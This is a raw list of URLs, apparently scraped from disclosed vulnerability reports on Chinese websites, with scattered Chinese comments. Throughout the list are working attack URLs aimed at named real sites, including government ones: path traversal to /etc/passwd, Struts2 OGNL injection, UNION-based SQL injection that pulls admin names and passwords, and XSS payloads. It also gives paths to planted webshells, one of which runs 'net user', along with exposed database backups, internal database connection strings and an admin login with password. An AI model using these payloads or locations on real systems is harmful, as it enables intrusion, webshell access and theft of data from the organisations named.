http://www.yozosoft.com/gywm/newsInfo!select.do http://pan.baidu.com/share/link?shareid=2907637738&uk=2368521055 URL:http://weixin3.gg.pp.cc/wap/product/info.html?store_id=0&id=9217 http://mobile.womai.com/wmapi/login http://gg.pp.cc/prize.html?platform=qzone&nick=1&appid=65 http://gss.hisense.com:6699/ http://www.dfyb.com.cn/InfoPublish/newscenter_detail.asp?news_id=2080 http://www.dfyb.com/InfoPublish/newscenter_detail.asp?news_id=2022 http://www.dfyb.com/InfoPublish/newscenter_detail.asp?news_id=1309 http://www.dfyb.com/newcenter/newscenter_detail.asp?news_id=173 http://gg.pp.cc/waibao/hl/active.php?uid=1&year=2013&month=5&date=14 http://www.youc.com/ http://www.esafenet.com/data/admin/ver.txt http://www.dflpj.cn/main/ http://www.dflpj.cn/temp/ http://www.dfyb.com.cn/inc/ http://www.dfackc.net/database.rar http://baike.baidu.com/view/25660.htm http://www.dfackc.com/database.rar http://www.dfackc.net/database.rar http://www.dfaclxc.com/database.rar http://www.dfaclxc.net/database.rar http://www.dfxch.net/database.rar http://www.dfxylxc.com/database.rar http://www.dfxylxc.net/database.rar http://stockdata.stock.hexun.com/jgcc/industryrank.aspx?id=1 http://202.119.47.40:8080/sq/add.asp?ssnum=111 http://anquan.baidu.com/bbs/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://222.46.21.60:8080/,看了一下,存在struts2 http://id.kingdee.com/password/forgot.action http://brand.wljhealth.com/public/detail.php?id=8 http://teleinfo.catr.cn/Default.aspx http://teleinfo.catr.cn/ScriptResource.axd?d=yPQPLHHoKBhJOfSvyKfWvwWjo8xAmmkc62A8r4zelAEAAAAAAAAAAAAAAAAAAAAA0 http://www.panjk.com/RSSpanjk.aspx?rsstype=1 http://ui.letv.com注册一个然后发帖 http://ta.qidong.gov.cn/proposal/index.jsp http://home.xdf.cn/ 
http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://www.bankcomm-microfilm.com/laoyouba/manage/list.php http://www.bankcomm-microfilm.com/laoyouba/manage/test.php http://cinema.youku.com/philips/images/.svn/entries http://ilovee-surfing.youku.com/css/.svn/entries http://rej.youku.com/.svn/entries http://ninjiom.youku.com/index.php?per=1&s=%22%20onmouseover%3dalert%28%2fxss%2f%29%20bad%3d%22 http://pino.youku.com/crossdomain.xml http://bbs.ngl.tnyoo.com/forum.php http://202.197.191.232/markbook/GetIndex.jsp http://202.197.191.232/markbook/GetIndex.jsp?UName=test http://qz.jianghu.taobao.com/trade/trade_coin.htm?order_id=[orderid http://xx~/wcm/services,web http://bbs.mumayi.com/forum.php?mod=post&action=newthread&fid=128 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://sq.xywy.com/uc/reg/regfinish.php?reguid=20234441 http://tj.xywy.com/interface/demon.php?id=1&num=7 http://www.dfyb.com/newcenter/Admin_Login.asp http://www.dfyb.com/Inc/ http://www.dfyb.com/flash/ http://www.dfyb.com/Board/ http://www.dfyb.com/newcenter http://www.dfyb.com/index/ http://www.dfyb.com/ad/ http://www.dfyb.com/sales/ http://www.dfyb.com/samples/ http://www.dfyb.com/_notes/ http://www.dfyb.com/_vti_pvt/ http://www.dflpj.cn/aspnet_client/ http://www.dflpj.cn/images/ http://www.dflpj.cn/scripts/ http://www.dflpj.cn/temp/ http://www.dflpj.cn/image/ http://www.dflpj.cn/main/ http://www.dflpj.cn/report/ http://www.dflpj.cn/download.aspx http://www.dflpj.cn/main/MainA08.aspx http://www.dflpj.cn/main/menu3.asp http://219.139.20.19/setup.asp?action=setup http://219.139.20.19/find/findfwz.asp http://219.139.20.19/top.asp http://219.139.20.19/uploadPic.asp http://www.12320.gov.cn/news/show.jsp?id=6262 
http://www.12320.gov.cn/manage/download.jsp?filepath=fujian/../../../../../../etc/passwd www.12320.gov.cn/manage/download.jsp?filepath=fujian/../manage/login.jsp http://111.13.100.72:8080/ http://shang.hlgnet.com/gotogg.php?id=298 http://shang.hlgnet.com/gotogg.php?id=298 http://rds.blog.alibaba-inc.com/?author=1 http://rds.blog.alibaba-inc.com/?author=16 http://www.svnchina.com/svn/gxy http://606wan.com/等多个网站源码以及数据库 http://zhushou.360.cn/flash/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://yanbao.stock.hexun.com/handle/Iframe_dzgg.aspx?code=600050 http://www.qfkd.com.cn/zxkf/Admin/SYSTEM/adminLogin.aspx http://www.qfkd.com.cn/zxkf/powertalk/im/chat.aspx http://119.253.56.22/Cancle.action http://119.253.56.22/Silic.jsp http://www.yooli.com/detailmessage.session.action?mid=201 http://222.82.232.227:9991/bscx!bjgs.action http://222.82.232.227:9991/Silic.jsp http://222.82.232.227:9991/qwe11111111.jsp?cmd=net+user http://www.4.cn http://www.gxgp.gov.cn:9000/egps/Silic.jsp http://www.gxgp.gov.cn:9000/egps/userlogin_login.action user:admin pass:12345 http://msg.mail.163.com/cgi/mc?funcid=getusrnewmsgcnt&template=newmsgres_setcookie.htm&callback=getNewMail&fid=1&username=XXXXXX@163.com&_=1376378237812 http://to.taobao.com/OJweqgy?spm=a1z02.1.1000293.5.H2IB7K&_g=a12005723&_tg=15&_f=feedBody&_t=15&_n=1768368836&_tk=6650336752 http://ttaobxxc.com/sdfsdf?id=123s5d4f5f4x45345345 http://955.cc/kbNA http://www.360sky.com/download/gameonline.jsp?classid=19&fileid=463 http://speedtest.zj.chinaunicom.com/netinfo.jsp?infoType=kdzs http://qm.zj165.com/sign/news.do?method=showNewsAffiche&newid=EBBF898657D84D30AD5CD6168B027EBE http://xxx.xxx.xxx:xxx/device_set_manage.asp?userlogin.asp页面能够备份系统设置信息 http://221.235.153.152/upimg/info/1css.jsp http://cos.sanguosha.com/admin/index.php 
http://smart.szpay.net/IndexAction_logout.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://202.136.60.183/admin/login.aspx http://cmb.zbird.com/index.php?m=module_zb2_article.ui_article_portal.view&a_id=65DF504D817CC5CC5AC11B5A9FC6610D http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://bbs.radio.wanmei.com/ http://bbs.kdxy.wanmei.com/forum.php http://bbs.world2.wanmei.com/index.php http://bbs.zhuxian.wanmei.com/forum.php http://bbs.w2i.wanmei.com/forum.php http://bbs.xlzj.wanmei.com/ http://bbs.sgcq.wanmei.com/ http://bbs.yt.wanmei.com/forum.php http://bbs.xa.wanmei.com/ http://bbs.rwpd.wanmei.com http://g.candou.com http://www.nbkjt.com/portalPage/feedback!ToAdd.action http://www.nbkjt.com/404.jsp http://bbs.cwan.com/home.php?mod=spacecp&id=../../robots.txt%0057 http://lcx.cc/?i=3524 ftp://hdwj.gov.cn/www/ ftp://hdwj.gov.cn/www/ http://wooyun.org/bugs/wooyun-2013-029023,顺手测了一下 http://203.91.45.154/ http://203.91.45.154/templates/integrationnet/integrationnetPage.action http://203.91.45.154/Silic.jsp http://203.91.45.154/openope.jsp ftp://www.hubeiqiye.com/ http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://corp.metersbonwe.com/shownewsCorp.php?id=88 
http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://210.72.11.110:8080/storage/Silic.jsp http://210.72.11.110:8080/storage/oppop.jsp http://pplms.cn/x/admin/IndexManage.asp http://pplms.cn/x/admin/Template/TemplateManage.asp?CurrPath=%2Fx%2F http://pplms.cn/x/admin/Template/Template.asp?Action=Modify&FileName=Config%2Easp&CurrPath=%2Fx%2FConfig http://ip.app.letv.com/api/SubmitIpLocSave.dhtml, http://www.sach.gov.cn:80/module/download/downfile.jsp?filename=* http://bbs.jd.com/home.php?mod=space&uid=1&do=profile http://bbs.jd.com/forum.php?mod=viewthread&tid=25&extra=page%3D1 site:bbs.jd.com inurl:profile http://bbs.jd.com/home-space-uid-4-do-profile-view-me.html http://bbs.jd.com/admin.php http://www.mbmuseum.org/admin/index.html http://www.w3.org/TR/html4/loose.dtd http://www.w3.org/TR/html4/loose.dtd http://www.wiseuc.com/admin/downcom/list.php http://www.wiseuc.com/admin/news/list.php http://www.wiseuc.com/upload/userfiles/files/test.txt/.php http://news.7k7k.com/huodong/201307editor/ http://8.7k7k.com http://news.7k7k.com/huodong/201307editor/网站 http://8.7k7k.com的相关页面 http://tieba.07073.com/search存在Post注入漏洞,注入后,发现好多好多数据库。 http://121.14.129.203/user/myinfo.do http://www.joinwish.com/wish/show/id/10067221 http://jwxt.zhongxi.cn/jwweb/_photo/Student/201100000001.jpg http://jwxt.zhongxi.cn/jwweb/_photo/Student/201100000318.jpg http://61.158.99.132:8084/manager/ www.cpi.net.cn http://www.joinwish.com/wish/show/id/10067637 http://get.766.com/go.php?id=7385 http://mail.catr.cn/js/ http://mail.catr.cn/mail,后面没有/,会下载一个十几M的文件,解压后一百多M,是邮件的日志,这可是只有管理员才能看的东西。 http://eoffice8.weaver.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr= http://180.149.136.75/212 http://180.149.136.75/uploadfile http://taise.org.tw/ taise.org.tw/active_areashow2.php?id=67 http://taise.org.tw/taise_admin/login.php http://tu.duowan.com/index.php?r=view/gallery&id=70883,是个图站 
http://tu.duowan.com/admin/default/index.html http://seentao.yonyou.com/admin http://health.yonyou.com http://health.yonyou.com/readme.txt数据库信息 http://health.yonyou.com/yiliao.sql数据库备份 http://health.yonyou.com/admin/fckeditor/editor/fckeditor.html编辑器 http://gov.yonyou.com/ http://gov.yonyou.com/list.php http://gov.yonyou.com/read.php http://gov.yonyou.com/fwzc/test.php http://kj.qdf.gov.cn:1010/win/showsignup.ashx?signupid=101 http://kj.qdf.gov.cn:2020/win/showsignup.ashx?signupid=101 http://en.teleinfo.catr.cn/default.aspx http://en.teleinfo.catr.cn/ScriptResource.axd?d=xPMQD-3lLhQqKPmxbmtZVmBfNKoiG26UCsIxATZstWQAAAAAAAAAAAAAAAAAAAAA0 http://mmsdiy.tom.com/chinamobile/showtmpimg.php?tmpfilename=../../../../../../../../../../../../../../etc/passwd http://jingboquan.com http://jingboquan.com/admin_upfile.asp http://oa.ketd.gov.cn/bak.rar http://jh.gametea.com/ www.gametea.com也是用phpcms改的 http://jh.gametea.com/ http://www.jyczj.gov.cn/jyczj/sitePages/subPages/page.action http://www.jyczj.gov.cn/jyczj/jspspy.jsp http://fda.jiangyin.gov.cn/jyfda/sitePages/subPages/page.action http://fda.jiangyin.gov.cn/jyfda/sitePages/subPages/page.action jdbc:mysql://192.168.1.106/jywcms?autoReconnect=true jdbc:mysql://192.168.1.106/jywcms_function?autoReconnect=true jdbc:mysql://192.168.1.106/count?autoReconnect=true jdbc:mysql://192.168.1.106/jywcms?autoReconnect=true jdbc:oracle:thin:@192.168.1.122:1521:JYZW jdbc:microsoft:sqlserver://32.58.254.242:1433;Databasename=Jy12345Temp http://jx.china.com.cn虽然普通的plus的90sec.php漏洞页面维修好了,可是/plus/mytag_js.php?aid=9090这里还是可以写入一句话, http://125.65.165.8:7001 http://job.bjcsair.com/index.action http://job.bjcsair.com/Silic.jsp http://www.xunyang.gov.cn/ewcms/login.do http://www.xunyang.gov.cn/ewcms/Silic.jsp http://210.76.65.123:81/FPApp/wbxx/news/list.jsp?id=4 http://www.hasmx.hrss.gov.cn/survey/survey.aspx?id=-1 http://www.eq.hh.cn/seismic/listCatalog!index.action?eqQuery.entityName=Catalog_R http://www.eq.hh.cn/Silic.jsp 
http://bbs.crsky.com/thread_sort.php?fid=204 http://yp.eol.cn/jichengselectedlist.php?province=%CB%C4%B4%A8&membertypeid=1 http://yp.eol.cn/mana/ http://busass.chanjet.com:8080/reg/reg!regIndex.do http://crm.chanjet.com/backup/.svn/ http://crm.chanjet.com/backup/lib/.svn/entries http://crm.chanjet.com/backup/.svn/entries http://crm.chanjet.com/account/import/.svn/entries http://busass.chanjet.com:8080/fckeditor/editor/fckeditor.html http://www.hejiang.gov.cn/template/hjxmj/news_detail.jsp?id=5c26e0783fe8a7df013fec1279a301b3 http://202.127.42.180/ http://202.127.42.180/shell.asp;.txt http://202.127.42.180/test.txt https://mail.gsedu.gov.cn/login.php http://www.yunfufgj.gov.cn/ http://www.yunfufgj.gov.cn/Silic.jsp http://www.yunfufgj.gov.cn/test.txt http://www.yunfufgj.gov.cn/oppppo.jsp http://app.yule.sohu.com/test/ http://mail.sohu.com/mapp/manage.jsp http://ecard.mail.sohu.com/admin/ http://05133.astro.women.sohu.com/article_show.php?article_id=12211 http://tv.sohu.com/upload/11tvhead/.svn/entries http://picture.auto.sohu.com/manual/ http://csldata.sports.sohu.com/team.php?teamid=4&season=2013 http://mirrors.sohu.com/ http://mail.chinaren.com/images/ http://mail.chinaren.com/reg/ http://www.w3.org/TR/html4/loose.dtd http://hantao.m1905.com/inc/book.asp?nid=175339 
http://www.zyhyhq.com/helpinfo.jsp?id=999999.9%27+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28manager.name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60zyhyhq%60.manager+Order+by+id+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536+and+%27x%27%3D%27x http://www.zyhyhq.com/helpinfo.jsp?id=999999.9%27+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28manager.pwd+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60zyhyhq%60.manager+Order+by+id+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536+and+%27x%27%3D%27x http://bbs.changyou.com/inc/ http://bbs.ldj.changyou.com/bbs/stat/ http://bbs.ty.playcool.com/inc/ http://bbs.ldj.changyou.com/inc/ http://bbs.cyou.com/inc/ 
http://bbs.changyou.com/inc/ http://wgact.yeyou.com/sword/config.jsp http://wgacc.yeyou.com/login/ http://games.yeyou.com/img/ inurl:admin_edit.asp立即找到了整个网站的问题,而且不止是一个地方! http://bbs.game.changyou.com/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf www.joinwish.com http://www.joinwish.com/wish/show/id/1432 https://1.202.150.71/svn/ziroom/ http://e.mwork.org/sys/main.action http://hr.sohu.com/ http://www.wintalent.cn:8010/wt/login!input http://db.neotv.cn/lol/champion/Alistar#hero_comment http://my.elong.com/GrouponOrderDetail_cn.html?orderid=XXXXX http://fccszt.fccs.com/vote/fcwr/manage.jsp?page=1 http://venus.suning.com/ym/reg.aspx www.tianya.cn http://hr.www.net.cn/wt5/login!input http://www.gionee.com/68webmaster/index.php http://www.gionee.com/68webmaster/fck/editor/filemanager/connectors/php/upload.php http://www.gionee.com/68webmaster/filemanage.php?currpath=..%2F http://www.gionee.com//uploads/upload_files/month_1308/0818023328.php http://wed.27.cn/marry/set_index.php?action=set_memberstore&sid=165 http://wed.27.cn/marry/marryadmin/web/login.php http://www.ebfcn.com/ http://www.ebfcn.com/Job/JobInfo.aspx http://edu.bhmc.com.cn/portal/center/reg.action http://113.108.183.202/ http://fsq-database.cn.carrefour.com/login.action http://www.pcbpartner.cn/web/pinke/index.action http://sms.12321.cn/index.jsp http://jys.picchealth.com:8080/login.action http://jys.picchealth.com:8080/Silic.jsp http://zhdajy.zhda.gov.cn:8080/login.action http://zhdajy.zhda.gov.cn:8080/Silic.jsp http://202.96.24.12/ http://114.80.84.105/fna/login.action http://114.80.84.105/fna/guige.jsp http://202.96.54.116 http://202.96.54.116/shell.aspx http://fax.7daysinn.cn:77/ http://www.mdjnx.com/index!elecBank.action http://www.mdjnx.com/index.action http://qk.cams.cma.gov.cn/jams/ch/index.aspx?year_id=2013&quarter_id=3 
http://mp.weixin.qq.com/mp/redirect?url=126.am/FhNRD3 http://112.83.254.19:83/ www.tuniu.com-access_`/bin/date www.tuniu.com.`hostname`.log http://jingdian.tuniu.com/bdb/place_desc.db www.tuniu.com-access_`/bin/date www.tuniu.com.`hostname`.log http://www.ipcc.cma.gov.cn/ http://www.ipcc.cma.gov.cn/background/index.php?lang=cn&NewsID=18 http://m.tianya.com http://m.tianya.cn/index.jsp?idwriter=81847003&key=*********&chk=******************************** http://116.246.39.203/announce.aspx?id=722 bt:/pentest/database/sqlmap# http://116.246.39.203/announce.aspx?id=722 http://61.183.11.149:8081/目录遍历 http://61.183.11.149:8081/web/webmanage/web_manage.asp http://bbs.wan.sogou.com/images/default/logo.gif/.php http://bbs.wan.sogou.com/attachments/month_1308/130819133046dedb379520fb11.jpg/.php http://www.hbws.tv/video/show.php?itemid=1109 http://www.baidu.com/?a=1 http://ting.zhaoxiaoshuo.com/data/upload/1376889945_f3b94e88bd1bd325af6f62828c8785dd.php http://ting.zhaoxiaoshuo.com/public_m/js_player/.svn/entries ftp://183.61.XX.XX/ http://www.fsa.aero http://www.fsa.aero/fsp/FsPlistflight.php?listflight=49788 http://www.f-roadpay.com.cn/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://wlkpc.965432.com/wlkpClient/home.do http://www.joinwish.com/wishsquare/index/val/1 http://www.joinwish.com/wishgive2/index/new/Y/wish_id/10067768 http://tvplay.pptv.com/search http://2sc.sohu.com http://118.85.207.27:8000/login.action encap:Ethernet FC:8A:74 addr:10.10.21.22 Bcast:10.10.21.255 Mask:255.255.255.0 fefc:8a74/64 Scope:Link MTU:1500 packets:406163456 packets:269985946 txqueuelen:1000 
http://school.suning.cn/article.php?id=10 http://school.suning.com/system/ http://school.suning.com/system/main.php http://school.suning.com/system/menu.php http://bbs.zhongsou.com/index/amchart/trend_h/data.php?d=1343 http://weike.zhongsou.com/bbs/uc_server/avatar.php?uid=2344 http://weike.zhongsou.com/bbs/uc_server/avatar.php?uid=2344 http://d3channel.zhongsou.com/Api/CateInformation.ashx?cateid= http://uhome.blogchina.com/tempRegUser.action http://ywt.blogchina.com/selectAll.action http://download.blogchina.com/social/weixin2012/index.action http://uhome.blogchina.com/guige.jsp http://ywt.blogchina.com/guige.jsp http://download.blogchina.com/social/guige.jsp http://xueji.jxt189.com/hechi http://game.pipi.cn/checkUser.action http://dggjj.dg.gov.cn/tbdownload/downloadfile.asp?strfilenm=文件地址 http://so.766.com/web.jsp?keyword=%3Cscript%3Ealert%28%27Hello%20World!%27%29%3C/script%3E http://202.101.163.196:81/sql.aspx http://202.101.163.196:81/ http://bbs.hjsm.tom.com/uc_server/ http://erp.998.com/WebPortal_Operation/OperationWeekReportData/AuditAlert.aspx http://erp.998.com/webportal_electroniccommerce/Channels.aspx http://jxcrj.com/text/webtext.aspx?type=-1 http://mis.998.com/portal/workflow/prints/shiyongqizhoubao.aspx?instanceid=d961b9f3-fe32-4ae8-a8fe-77663f7a5c47 http://mis.998.com/greentreeinn/CheckLogon.aspx?Uname=bGlhbw== http://mis.998.com/Portal/SelectUser.aspx?UserControl=ctl01&Mode=Multi&UserIDControl=ctl02&UnitType=8&VisibleUnitType=15&VisibleType=1&VisibleUnits=&Level=100&ExpandDepth=1 http://youxi.baomihua.com/tuiguang.aspx?pageid=180 http://www.yakool.com/login.action http://www.huyigroup.com.cn/manage/ http://www.huyigroup.com.cn/manage/manage.php http://s.6677bank.com/shuyin/searchPage.do?tagType=1&tagStr=%27 https://login.shfft.com/jumpLogin.action http://shop.wondershare.cn/shop/goods!search.action http://hzbench.homelink.com.cn/agentbench/agent/login.action http://bbs.play.cn/ http://www.5lily.com/shop/goods!search.action 
http://ipaper.cnhan.com/seo/queryArticlesByDateAction.action http://www.jcjob.cn/qyzp.action http://i.auto.sohu.com/user/message/send.at xxx.xx/x.js http://pk.tom.com/web/download_page.jsp?from=00403&q_id=99&mobile_game_id=609,注入点mobile_game_id http://xshow.pipi.cn/index.php?r=user/openLogin&type=../../../../../../../../../../etc/passwd%00.jpg https://www.vips100.com/ http://315.in.sohu.com/Complaints/add http://www.cctvdream.com.cn/dynasty/works.php?api=qry http://124.127.255.3:8080/ http://www.zsb.pudong-edu.sh.cn/CenterWeb/xjgl/index.asp?SearchValue=%27&LmID=74&submit=%CB%D1%CB%F7 http://www.ecare365.com/ http://jiameng.edai.com/empower.aspx?condition=1 http://box.7k7k.com/manage/ http://www.domain.gov.cn/siteserver/CMS/console_tableMetadata.aspx?ENName=cms_Content&TableType=BackgroundContent http://www.domain.gov.cn/siteserver/Upgrade/default.aspx http://gh.syd.com.cn/dio/browse/ http://gh.syd.com.cn/dio/browse/listAffairByPagegh.do http://meeting.staff.xdf.cn/GA/main/链接后面,如http://meeting.staff.xdf.cn/GA/main/123456 http://fj.voole.com/movie.action http://www.fmi.com.cn/admin.php/Party/ http://www.fmi.com.cn/admin.php/User/userScoreList/ http://www.fmi.com.cn/admin.php/AuditorScore/ http://smbservices.lenovo.com.cn/test/fengling/Data/ http://www.ankang.ccoo.cn/login.asp http://e-learning.lenovo.com.cn/forum/uc_server/admin.php http://engine.cqvip.com http://engine.cqvip.com/zhuanti/list.aspx?cid=12 http://cp.shoujibao.net/ www.wmgov.cn http://web.admin5.com/2.txt inurl:/class/?1.html inurl:class/index.php?catid=0 inurl:/page/html/?1.html http://home.www2.soufun.com/pwdapply.php http://bea.sportq.com:8081/SportQBkAdmin/userinfo.html http://bea.sportq.com:8081/SportQBkAdmin/userinfo.html?findUserDetail&&userId=10000 http://222.85.90.62/advertisement.do http://ltms.lenovo.com/ http://ltms.lenovo.com/Order/PackingQuestionItemList.aspx?Ord=0005987151&Seq=000010 http://dcs.lenovo.com.cn/dc/main!doLogin.action http://www.nongfuspring.com/app/about.action 
http://lis.lenovo.com/lots/Login.aspx www.doctorcom.com http://dns.aizhan.com/?q=www.doctorcom.com http://www.hnea.gov.cn/manage/content/docmanage/download.jsp?filePath=/../../../../../../etc/passwd http://202.196.13.210/ http://210.27.80.87/ http://202.121.166.201:8000/ http://www.bowenedu.cn/da/index.htm http://www.egotour.cn/index.do?method=toIndex http://www.egotour.cn/css3.jsp http://m.baidu.com/from=1787a/bd_page_type=1/ssid=0/uid=5A18364DCDF1B93D7CE99B7AF2919A15/pu=sz@1320_480,osname@browserandroid,cuid@BDB_95a2cc5ac8c04215-063370578443468%7C8769632031,ua@BDB_320_480_android_1.87.0.0_j2,ut@SL-Z8_4.02_10,usm@0,ta@bmb_2_2.3_5_2.2/w=0_10_https://aq.qq.com/cn2/findpsw/mobile_web_find_input_account?account=1********1/t=zbios/l=3/tc?srd=1&dict=20&src=http://www.wooyun.org/bugs/wooyun-2010-032481 aq.qq.com/cn2/findpsw/mobile_web_find_input_account?account=1********1 http://qd.epweike.com/test.php http://183.60.115.244/adduser.jsp) http://car.hbtv.com.cn//kuxl_w_show.aspx?lx=m104m001&id=667 http://pccarertest.lenovo.com.cn:81/lenovo/ http://pccarertest.lenovo.com.cn:81/lenovo/downfile.php http://pccarertest.lenovo.com.cn:81/lenovo/images/1.php http://info.jctrans.com/zxzx/qygg/AnnoDetail.aspx?id=262959 http://action.jctrans.com/vote/info/frmindex.aspx?id=2 http://www.taobao.com/go/act/sns/taoban_iphone.php?apkid=%22%3E%3Cscript%3Ealert%28/wooyun/%29%3C/script%3E%3Cimg http://env.nankai.edu.cn/lab/ http://env.nankai.edu.cn/lab/news.asp?fileid=60 http://env.nankai.edu.cn/lab/video.asp?fileid=1 http://env.nankai.edu.cn/lab/admin/default.asp http://env.nankai.edu.cn/lab/admin/Southidceditor/datas/SouthidcEditor.mdb http://jqyx.17u.com/admin http://edp.nankai.edu.cn/search/index.php?page=1&catid=&myord=uptime&myshownums=20&key=88952634 http://www.xxx.com/admin/regUsersInfo.aspx http://www.17u.com/activity/17u-changyudongtian/ http://59.37.54.194:3606/111223/InstallRevisit.aspx http://59.37.54.194:1000/ http://121.32.136.21:1000/ http://202.104.214.67:1000/ 
http://movie.douban.com/subject/20388223/comments?sort= http://www.twsm.com.cn/flash_upload.php?modelid=189 http://www.wuling.com.cn/fiwebeditor/admin/upload.aspx?id=1&dir=../../../ http://x.x.x.x:8866/ZWeb/login/login.aspx bt:/pentest/database/sqlmap# http://www.98tuan.com.cn/do/search.php http://youth.sdu.edu.cn/system.jsp http://lefen.lenovo.com/index.php/Kebi/ http://data.euro2012.sohu.com/player/ajax/player_list.ajax.php?team_id=239 http://pan.baidu.com/share/link?shareid=172262024&uk=4164057933 https://passport.lenovo.com/wauthen/login?lenovoid.action=uilogin&lenovoid.source=browser:realm:chita.lps.lenovo.com&lenovoid.realm=chita.lps.lenovo.com&lenovoid.uinfo=username&lenovoid.cb=http://lefen.lenovo.com/lfb/lenovo.php?mod=login https://passport.lenovo.com/wauthen/login?lenovoid.action=uilogin&lenovoid.source=browser:realm:chita.lps.lenovo.com&lenovoid.realm=chita.lps.lenovo.com&lenovoid.uinfo=username&lenovoid.cb=http://vip.yupage.com/lenovo.php http://vip.yupage.com/lenovo.htm http://www.lenovo.com.cn/?[令牌 http://202.107.203.25/ http://sd.189.cn/ecs_search/search_type_all/admin/ http://city2010.house.sina.com.cn/52shanghai/search.php www.whmc.edu.cn/jl_admin/ http://220.189.211.69:85/FrameSet/Login.aspx http://220.189.211.69/xiaofang/ chinese.hust.edu.cn/admin/ http://58.221.253.59:8081/ http://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=此处是跳转的url地址 http://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=http://www.m4sk.net http://) http://app.soccer.renren.com/go_rr.php?sid=16 http://ideaclub.lenovo.com.cn/forum/admin.php http://ideaclub.lenovo.com.cn/erazer/admin.php http://ideaclub.lenovo.com.cn/club/index.php?m=mycms&c=index http://ideaclub.lenovo.com.cn/terry/ http://blog.alipay.com/?s=%22%3E%3Cscript%3Ealert%28/wooyun/%29%3C/script%3E%3Cimg http://robot.dangdang.com/WebIm/page/officialPortal.jsp http://www.douban.com/location/wuhan/series?start=%22%3E%3Cscript%3Ealert% 
